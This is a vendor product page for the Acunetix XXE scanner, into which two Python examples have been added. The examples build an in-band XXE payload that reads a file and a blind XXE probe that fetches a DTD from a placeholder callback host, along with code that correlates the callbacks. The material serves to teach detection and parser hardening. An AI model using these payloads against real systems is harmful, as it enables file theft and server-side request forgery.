
MANAGE YOUR WEB SECURITY WITH

XXE Scanner


XML External Entity (XXE): Use Acunetix as Your XXE Scanner

XML External Entity (XXE) is a vulnerability in how an application's XML parser handles external entities, a widely available but rarely used feature of XML. When the parser is allowed to resolve them, an attacker who controls the XML input can read local files, reach internal hosts and services (which is why XXE is a common route to Server-side Request Forgery, SSRF), or cause a Denial of Service (DoS). It is also possible to use XXE to port-scan the internal network behind a web application, and in some cases XXE is one step in a multi-stage attack that leads to remote code execution. Most XXE attacks are prevented by configuring the application's XML parser correctly (disable DTD processing, or at least external entity resolution and external DTD loading), so they are usually not hard to fix. Finding them in a large codebase is the hard part, especially because many XXE vulnerabilities are blind: nothing from the entity is reflected in the response, and the only evidence is a DNS or HTTP callback from the parser to a server the tester controls, so they can only be detected with out-of-band (OOB) testing. Acunetix is a web application vulnerability scanner and, as part of the many vulnerability tests it performs, it looks for advanced variations of XXE, including blind XXE, using the Acunetix AcuMonitor technology as its out-of-band listener.
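The parser misconfiguration the paragraph above refers to, shown as an added example that is not part of this page or of the Acunetix product: Python's xml.sax parser with external general entities enabled (the behaviour of Python before 3.7.1) beside the hardened default. The "order" document, the secret file and its path are constructed for the demonstration; the payload shape (a SYSTEM entity declared in the internal DTD subset and referenced in element text) is the classic in-band XXE probe.

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data so we can see exactly what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Parse attacker-controlled XML with xml.sax.

    resolve_external_entities=True reproduces the vulnerable configuration:
    when expat meets a SYSTEM entity, xml.sax opens the file or URL and the
    fetched bytes are parsed as part of the document. False (the default
    since Python 3.7.1) makes the parser skip external entities, so &xxe;
    expands to nothing and no file or URL is ever opened.
    """
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    # With resolution enabled, a SYSTEM id that cannot be opened does not
    # fail silently: xml.sax raises SAXParseException for the reference.
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def xxe_payload(target_url):
    """Classic in-band XXE: declare an external entity and reference it in a
    field the application echoes back (here, the <item> text)."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY xxe SYSTEM "{target_url}">\n'
        "]>\n"
        "<order><item>&xxe;</item></order>"
    ).encode()


def demo():
    """Returns (text seen by the vulnerable parser, text seen by the hardened one)."""
    with tempfile.TemporaryDirectory() as workdir:
        # Constructed stand-in for a sensitive file on the application server.
        secret_path = Path(workdir) / "secret.txt"
        secret_path.write_text("db_password=hunter2")
        payload = xxe_payload(secret_path.resolve().as_uri())  # file:///.../secret.txt

        leaked = parse_untrusted_xml(payload, resolve_external_entities=True)
        hardened = parse_untrusted_xml(payload, resolve_external_entities=False)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser saw:", repr(leaked))
    print("hardened parser saw:  ", repr(hardened))
```

The same switch exists in every mainstream parser under a different name (DocumentBuilderFactory features in Java, the XmlResolver of XmlReaderSettings in .NET, LIBXML_NOENT in PHP); the check a practitioner wants is the one demo() performs: feed the parser a document that references a file you planted and confirm the contents never come back.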

Beyond Low-Hanging Fruit

While many web vulnerability scanners can find low-hanging XXE, Acunetix goes well beyond the basics thanks to its advanced crawler and JavaScript engine, DeepScan. Thanks to DeepScan, Acunetix also has full support for modern single-page applications (SPAs) and can understand and fully test applications that rely on JavaScript frameworks such as React, Angular, Ember, and Vue. This means that Acunetix can discover the underlying RESTful API when crawling a SPA. Because Acunetix understands JSON and XML request bodies, not just form fields, it can build a correct input scheme (an internal representation of web application input), which it then tests rigorously for XXE and other attacks such as SQL Injection, Cross-site Scripting (XSS), and HTTP host header attacks.

Runtime Source Code Analysis

In addition to being a fully automated black box vulnerability scanner (one that needs no knowledge of the backend code), Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is an optional sensor for Java, ASP.NET, and PHP applications that can easily be deployed on the application backend to analyze the application code while the scanner exercises it. This type of testing is known as gray box testing, since it combines the best of black box testing and white box testing. When testing for XXE vulnerabilities, AcuSensor increases the accuracy of a scan because it has access to the code on the backend. With AcuSensor, the Acunetix vulnerability scanner can also test pages that would not otherwise be discovered by crawling, thanks to the AcuSensor backend crawl technology.

Frequently asked questions

What is XXE?

XXE (XML external entity) is a class of vulnerabilities in web applications, and also the name of the attacks that exploit them. An XXE vulnerability lets an attacker supply XML through regular user input (a request body, an uploaded file, a SOAP message) that declares external entities, which the application's XML parser then resolves, with potentially dangerous results: local files are disclosed, internal services are contacted on the attacker's behalf, or the parser is tied up.

Read more about external XML entity injection attacks.

How dangerous is XXE?

XXE can lead to denial-of-service attacks, theft of information, and even to other attacks such as SSRF (server-side request forgery) or RCE (remote code execution). Therefore, it can be very dangerous.

See how an attacker can steal confidential information using XXE.

How do I check if I have XXE issues?

In practice, the reliable way to check an application for XXE issues is to use a vulnerability scanner, ideally alongside a review of how each XML parser in the code is configured. Several scanners are able to detect this type of vulnerability, but Acunetix is one of the very few that can also prove it. This means that Acunetix will, for example, show you that it accessed a confidential file from your web application using XXE.

Read how Acunetix proves that vulnerabilities are real.
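How a blind XXE check works when nothing is reflected in the response, the out-of-band case mentioned in the introduction and implied by this answer, as an added example that is not Acunetix code and does not describe AcuMonitor internals. The listener domain oob.example, the log format and the log lines are constructed for the example; the probe itself is the standard parameter-entity form that forces the parser to fetch an external DTD from a host embedding a unique token.

```python
import re
import secrets

# Assumption: a DNS/HTTP listener under our control, the role an OOB service
# such as AcuMonitor plays for a scanner. The hostname is hypothetical.
CALLBACK_DOMAIN = "oob.example"


def new_token():
    """Short random label; one per injection point so hits can be attributed."""
    return secrets.token_hex(4)


def blind_xxe_payload(token, callback_domain=CALLBACK_DOMAIN):
    """Build a blind XXE probe.

    The parameter entity %xxe points at an external DTD on a host that
    embeds the token. A parser that loads external DTDs resolves that
    hostname (DNS) and fetches the file (HTTP) even though nothing from the
    document is ever returned to the client, so the callback is the evidence.
    """
    dtd_url = f"http://{token}.{callback_domain}/xxe.dtd"
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE probe [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]>\n'
        "<probe/>"
    )


# Constructed listener log format:  <timestamp> <dns|http> <hostname> [<method> <path>]
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>dns|http)\s+(?P<host>[A-Za-z0-9.-]+)")


def correlate_callbacks(probes, log_lines, callback_domain=CALLBACK_DOMAIN):
    """Map listener hits back to injection points.

    probes: {token: injection point label}
    Returns {label: set of callback kinds seen}. A DNS-only hit already shows
    the parser resolved the external entity; an HTTP hit shows it went on to
    fetch the DTD, which is what OOB exfiltration builds on.
    """
    suffix = "." + callback_domain
    confirmed = {}
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        host = m.group("host").lower().rstrip(".")
        if not host.endswith(suffix):
            continue
        token = host[: -len(suffix)]
        label = probes.get(token)
        if label is None:
            continue  # scanner noise or a token we never sent: not evidence
        confirmed.setdefault(label, set()).add(m.group("kind"))
    return confirmed


def demo():
    """Two injection points probed; a constructed log shows only one calling back."""
    probes = {}
    payloads = {}
    for label in ("POST /import (body)", "POST /api/soap (Envelope)"):
        token = new_token()
        probes[token] = label
        payloads[label] = blind_xxe_payload(token)  # sent to the target in a real scan
    tokens = list(probes)
    log_lines = [  # constructed listener output
        f"2024-05-01T10:00:01Z dns {tokens[0]}.{CALLBACK_DOMAIN}",
        f"2024-05-01T10:00:01Z http {tokens[0]}.{CALLBACK_DOMAIN} GET /xxe.dtd",
        f"2024-05-01T10:00:02Z dns unsent-token.{CALLBACK_DOMAIN}",
        "2024-05-01T10:00:03Z dns www.example.com",
    ]
    return {"payloads": payloads, "confirmed": correlate_callbacks(probes, log_lines)}


if __name__ == "__main__":
    for label, kinds in demo()["confirmed"].items():
        print(f"blind XXE confirmed at {label}: {sorted(kinds)}")
```

The per-token hostname is what makes the result attributable: a callback proves not just that some parser somewhere resolved an entity, but which request triggered it, which is the difference between a finding and a suspicion.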

Why should I choose Acunetix to combat XXE?

Acunetix will find not only XXE but the other types of web vulnerabilities as well. Acunetix also fully integrates with a network scanner so you can perform web and network scans using the same interface. Acunetix is not only the fastest scanner on the market but also the only one available on platforms other than Windows or the cloud.

Learn more about Acunetix Premium and its capabilities.


Client: Xerox

“We use Acunetix as part of our Security in the SDLC and to test code in DEV and SIT before being promoted to Production.”

Kurt Zanzi, Xerox CA-MMIS Information Security Office, Xerox

© Acunetix 2024, by Invicti